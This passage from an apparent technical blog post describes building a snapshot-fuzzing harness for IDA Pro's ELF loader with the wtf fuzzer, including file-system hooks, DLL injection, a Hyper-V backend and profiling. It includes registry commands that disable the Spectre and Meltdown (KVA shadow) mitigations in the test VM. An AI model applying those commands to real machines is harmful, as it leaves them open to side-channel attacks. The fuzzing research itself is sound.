  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

wtf.exe run --name hevd --backend whv --state targets\hevd\state --runs=100000 --input targets\hevd\crashes\crash-0xfffff764b91c0000-0x0-0xffffbf84fb10e780-0x2-0x0

vtune

This report is really catastrophic because it means we spend twice as much time dealing with memory access faults than actually running target code. Handling memory access faults should take very little time. If anybody knows their way around whv & performance it'd be great to reach out because I really have no idea why it is that slow.

The birth of hope

After tons of work, I could finally execute the ELF loader from start to end and see the messages you would see in the output window. In the below, you can see IDA loading the elf64.dll loader then initializes the database as well as the btree. Then, it loads up processor modules, creates segments, processes relocations, and finally loads the dwarf modules to parse debug information:

>wtf.exe run --name ida64-elf75 --backend whv --state state --input ntfs-3g
Initializing the debugger instance.. (this takes a bit of time)
Parsing coverage\dwarf64.cov..
Parsing coverage\elf64.cov..
Parsing coverage\libdwarf.cov..
Applied 43624 code coverage breakpoints
[...]
Running ntfs-3g
[...]
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\loaders\elf64.dll)
ida64: ida64!msg(format="Possible file format: %s (%s) ", ...)
ida64: ELF64 for x86-64 (Shared object) - ELF64 for x86-64 (Shared object)
[...]
ida64: ida64!msg(format="   bytes   pages size description --------- ----- ---- -------------------------------------------- %9lu %5u %4u allocating memory for b-tree... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for virtual array... ", ...)
ida64: ida64!msg(format="%9u %5u %4u allocating memory for name pointers... ----------------------------------------------------------------- %9u
total memory allocated  ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k064.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\78k0s64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\ad218x64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\procs\alpha64.dll)
[...]
ida64: ida64!msg(format="Loading file '%s' into database... Detected file format: %s ", ...)
ida64: ida64!msg(format="Loading processor module %s for %s...", ...)
ida64: ida64!msg(format="Initializing processor module %s...", ...)
ida64: ida64!msg(format="OK ", ...)
ida64: ida64!mbox(format="@0:1139[] Can't use BIOS comments base.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: ida64!msg(format="Autoanalysis subsystem has been initialized. ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
[...]
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Reading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="Loading symbols", ...)
ida64: ida64!msg(format="%3d. Creating a new segment  (%08a-%08a) ...", ...)
ida64: ida64!msg(format=" ... OK ", ...)
ida64: ida64!mbox(format="", ...)
ida64: ida64!msg(format="Processing relocations... ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!mbox(format="Unexpected entries in the PLT stub. The file might have been modified after linking.", ...)
ida64: ida64!msg(format="%s -> %s ", ...)
ida64: Unexpected entries in the PLT stub.
The file might have been modified after linking.
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
[...]
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: ida64!msg(format="%a: could not patch the PLT stub; unexpected PLT format or the file has been modified after linking! ", ...)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dbg64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\plugins\dwarf64.dll)
ida64: kernelbase!LoadLibraryA(C:\Program Files\IDA Pro 7.5\libdwarf.dll)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="%s", ...)
ida64: ida64!msg(format="no. ", ...)
ida64: ida64!msg(format="Plugin "%s" not found ", ...)
ida64: Hit the end of load file :o

Need for speed: whv backend

At this point, I was able to fuzz IDA but the speed was incredibly slow. I could execute about 0.01 test cases per second. It was really cool to see it working, finding new code coverage, etc. but I felt I wouldn't find much at this speed. That's why I decided to look at using whv to implement an execution backend.

I had played around with whv before with pywinhv so I knew the features offered by the API well. As this was the first execution backend using virtualization I had to rethink a bunch of the fundamentals.

Code coverage

What I settled for is to use one-time software breakpoints at the beginning of basic blocks. The user simply needs to generate a list of breakpoint addresses into a JSON file and wtf consumes this file during initialization. This means that the user can selectively pick the modules that it wants coverage for.

It is annoying though because it means you need to throw those modules in IDA and generate the JSON file for each of them. The script I use for that is available here: gen_coveragefile_ida.py. You could obviously generate the file yourself via other tools.

Overall I think it is a good enough tradeoff. I did try to play with more creative & esoteric ways to acquire code coverage though. Filling the address space with int3s and lazily populating code leveraging a length-disassembler engine to know the size of instructions. I loved this idea but I ran into tons of problems with switch tables that embed data in code sections. This means that wtf corrupts them when setting software breakpoints which leads to a bunch of spectacular crashes a little bit everywhere in the system, so I abandoned this idea. The trap flag was awfully slow and whv doesn't expose the Monitor Trap Flag.

The ideal for me would be to find a way to conserve the performance and acquire code coverage without knowing anything about the target, like in bochscpu.

Dirty memory

The other thing that I needed was to be able to track dirty memory. whv provides WHvQueryGpaRangeDirtyBitmap to do just that which was perfect.

Tracing

One thing that I would have loved was to be able to generate execution traces like with bochscpu. I initially thought I'd be able to mirror this functionality using the trap flag. If you turn on the trap flag, let's say a syscall instruction, the fault gets raised after the instruction and so you miss the entire kernel side executing. I discovered that this is due to how syscall is implemented: it masks RFLAGS with the IA32_FMASK MSR stripping away the trap flag. After programming IA32_FMASK myself I could trace through syscalls which was great. By comparing traces generated by the two backends, I noticed that the whv trace was missing page faults. This is basically another instance of the same problem: when an interruption happens the CPU saves the current context and loads a new one from the task segment which doesn't have the trap flag. I can't remember if I got that working or if this turned out to be harder than it looked but I ended up reverting the code and settled for only generating code coverage traces. It is definitely something I would love to revisit in the future.

Timeout

To protect the fuzzer against infinite loops and to limit the execution time, I use a timer to tell the virtual processor to stop execution. This is also not as good as what bochscpu offered us because not as precise but that's the only solution I could come up with:

class TimerQ_t {
  HANDLE TimerQueue_ = nullptr;
  HANDLE LastTimer_ = nullptr;

  static void CALLBACK AlarmHandler(PVOID, BOOLEAN) {
    reinterpret_cast<WhvBackend_t *>(g_Backend)->CancelRunVirtualProcessor();
  }

public:
  ~TimerQ_t() {
    if (TimerQueue_) {
      DeleteTimerQueueEx(TimerQueue_, nullptr);
    }
  }

  TimerQ_t() = default;
  TimerQ_t(const TimerQ_t &) = delete;
  TimerQ_t &operator=(const TimerQ_t &) = delete;

  void SetTimer(const uint32_t Seconds) {
    if (Seconds == 0) {
      return;
    }

    if (!TimerQueue_) {
      TimerQueue_ = CreateTimerQueue();
      if (!TimerQueue_) {
        fmt::print("CreateTimerQueue failed.\n");
        exit(1);
      }
    }

    if (!CreateTimerQueueTimer(&LastTimer_, TimerQueue_, AlarmHandler,
                                nullptr, Seconds * 1000, Seconds * 1000, 0)) {
      fmt::print("CreateTimerQueueTimer failed.\n");
      exit(1);
    }
  }

  void TerminateLastTimer() {
    DeleteTimerQueueTimer(TimerQueue_, LastTimer_, nullptr);
  }
};

Inserting page faults

To be able to insert a page fault into the guest I use the WHvRegisterPendingEvent register and a WHvX64PendingEventException event type:

bool WhvBackend_t::PageFaultsMemoryIfNeeded(const Gva_t Gva,
                                            const uint64_t Size) {
  const Gva_t PageToFault = GetFirstVirtualPageToFault(Gva, Size);

  //
  // If we haven't found any GVA to fault-in then we have no job to do so we
  // return.
  //

  if (PageToFault == Gva_t(0xffffffffffffffff)) {
    return false;
  }

  WhvDebugPrint("Inserting page fault for GVA {:#x}\n", PageToFault);

  // cf 'VM-Entry Controls for Event Injection' in Intel 3C
  WHV_REGISTER_VALUE_t Exception;
  Exception->ExceptionEvent.EventPending = 1;
  Exception->ExceptionEvent.EventType = WHvX64PendingEventException;
  Exception->ExceptionEvent.DeliverErrorCode = 1;
  Exception->ExceptionEvent.Vector = WHvX64ExceptionTypePageFault;
  Exception->ExceptionEvent.ErrorCode = ErrorWrite | ErrorUser;
  Exception->ExceptionEvent.ExceptionParameter = PageToFault.U64();

  if (FAILED(SetRegister(WHvRegisterPendingEvent, &Exception))) {
    __debugbreak();
  }

  return true;
}

Determinism

The last feature that I wanted was to try to get as much determinism as I could. After tracing a bunch of executions I realized nt!ExGenRandom uses rdrand in the Windows kernel and this was a big source of non-determinism in executions. Intel does support generating vmexit when the instruction is called but this is also not exposed by whv.

I settled for a breakpoint on the function and emulate its behavior with a deterministic implementation:

//
// Make ExGenRandom deterministic.
//
// kd> ub fffff805`3b8287c4 l1
// nt!ExGenRandom+0xe0:
// fffff805`3b8287c0 480fc7f2        rdrand  rdx
const Gva_t ExGenRandom = Gva_t(g_Dbg.GetSymbol("nt!ExGenRandom") + 0xe4);
if (!g_Backend->SetBreakpoint(ExGenRandom, [](Backend_t *Backend) {
      DebugPrint("Hit ExGenRandom!\n");
      Backend->Rdx(Backend->Rdrand());
    })) {
  return false;
}

I am not a huge fan of this solution because it means you need to know where non-determinism is coming from which is usually hard to figure out in the first place. Another source of non-determinism is the timestamp counter. As far as I can tell, this hasn't led to any major issues though but this might bite us in the future.

With the above implemented, I was able to run test cases through the backend end to end which was great. Below I describe some of the problems I solved while testing it.

Problem 6: Code coverage breakpoints not free

Profiling wtf revealed that my code coverage breakpoints that I thought free were not quite that free. The theory is that they are one-time breakpoints and as a result, you pay for their cost only once. This leads to a warm-up cost that you pay at the start of the run as the fuzzer is discovering sections of code highly reachable. But if you look at it over time, it should become free.

The problem in my implementation was in the code used to restore those breakpoints after executing a test case. I tracked the code coverage breakpoints that haven't been hit in a list. When restoring, I would start by restoring every dirty page and I would iterate through this list to reset the code-coverage breakpoints. It turns out this was highly inefficient when you have hundreds of thousands of breakpoints.

I did what you usually do when you have a performance problem: I traded CPU time for memory. The answer to this problem is the Ram_t class. The way it works is that every time you add a code coverage breakpoint, it duplicates the page and sets a breakpoint in this page as well as the guest RAM.

//
// Add a breakpoint to a GPA.
//

uint8_t *AddBreakpoint(const Gpa_t Gpa) {
  const Gpa_t AlignedGpa = Gpa.Align();
  uint8_t *Page = nullptr;

  //
  // Grab the page if we have it in the cache
  //

  if (Cache_.contains(Gpa.Align())) {
    Page = Cache_.at(AlignedGpa);
  }

  //
  // Or allocate and initialize one!
  //

  else {
    Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
    if (Page == nullptr) {
      fmt::print("Failed to call aligned_alloc.\n");
      return nullptr;
    }

    const uint8_t *Virgin =
        Dmp_.GetPhysicalPage(AlignedGpa.U64()) + AlignedGpa.Offset().U64();
    if (Virgin == nullptr) {
      fmt::print(
          "The dump does not have a page backing GPA {:#x}, exiting.\n",
          AlignedGpa);
      return nullptr;
    }

    memcpy(Page, Virgin, Page::Size);
  }

  //
  // Apply the breakpoint.
  //

  const uint64_t Offset = Gpa.Offset().U64();
  Page[Offset] = 0xcc;
  Cache_.emplace(AlignedGpa, Page);

  //
  // And also update the RAM.
  //

  Ram_[Gpa.U64()] = 0xcc;
  return &Page[Offset];
}

When a code coverage breakpoint is hit, the class removes the breakpoint from both of those locations.

//
// Remove a breakpoint from a GPA.
//

void RemoveBreakpoint(const Gpa_t Gpa) {
  const uint8_t *Virgin = GetHvaFromDump(Gpa);
  uint8_t *Cache = GetHvaFromCache(Gpa);

  //
  // Update the RAM.
  //

  Ram_[Gpa.U64()] = *Virgin;

  //
  // Update the cache. We assume that an entry is available in the cache.
  //

  *Cache = *Virgin;
}

When you restore dirty memory, you simply iterate through the dirty page and ask the Ram_t class to restore the content of this page. Internally, the class checks if the page has been duplicated and if so it restores from this copy. If it doesn't have, it restores the content from the dump file. This lets us restore code coverage breakpoints at extra memory costs:

//
// Restore a GPA from the cache or from the dump file if no entry is
// available in the cache.
//

const uint8_t *Restore(const Gpa_t Gpa) {
  //
  // Get the HVA for the page we want to restore.
  //

  const uint8_t *SrcHva = GetHva(Gpa);

  //
  // Get the HVA for the page in RAM.
  //

  uint8_t *DstHva = Ram_ + Gpa.Align().U64();

  //
  // It is possible for a GPA to not exist in our cache and in the dump file.
  // For this to make sense, you have to remember that the crash-dump does not
  // contain the whole amount of RAM. In which case, the guest OS can decide
  // to allocate new memory backed by physical pages that were not dumped
  // because not currently used by the OS.
  //
  // When this happens, we simply zero initialize the page as.. this is
  // basically the best we can do. The hope is that if this behavior is not
  // correct, the rest of the execution simply explodes pretty fast.
  //

  if (!SrcHva) {
    memset(DstHva, 0, Page::Size);
  }

  //
  // Otherwise, this is straight forward, we restore the source into the
  // destination. If we had a copy, then that is what we are writing to the
  // destination, and if we didn't have a copy then we are restoring the
  // content from the crash-dump.
  //

  else {
    memcpy(DstHva, SrcHva, Page::Size);
  }

  //
  // Return the HVA to the user in case it needs to know about it.
  //

  return DstHva;
}

Problem 7: Code coverage with IDA

I mentioned above that I was using IDA to generate the list of code coverage breakpoints that wtf needed. At first, I thought this was a bulletproof technique but I encountered a pretty annoying bug where IDA was tagging switch-tables as code instead of data. This leads to wtf corrupting switch-tables with cc's and it led to the guest crashing in spectacular ways.

I haven't run into this bug with the latest version of IDA yet which was nice.

Problem 8: Rounds of optimization

After profiling the fuzzer, I noticed that WHvQueryGpaRangeDirtyBitmap was extremely slow for unknown reasons.

To fix this, I ended up emulating the feature by mapping memory as read / execute in the EPT and track dirtiness when receiving a memory fault doing a write.

HRESULT
WhvBackend_t::OnExitReasonMemoryAccess(
    const WHV_RUN_VP_EXIT_CONTEXT &Exception) {
  const Gpa_t Gpa = Gpa_t(Exception.MemoryAccess.Gpa);
  const bool WriteAccess =
      Exception.MemoryAccess.AccessInfo.AccessType == WHvMemoryAccessWrite;

  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once fixed, I noticed that WHvTranslateGva also was slower than I expected. This is why I also emulated its behavior by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
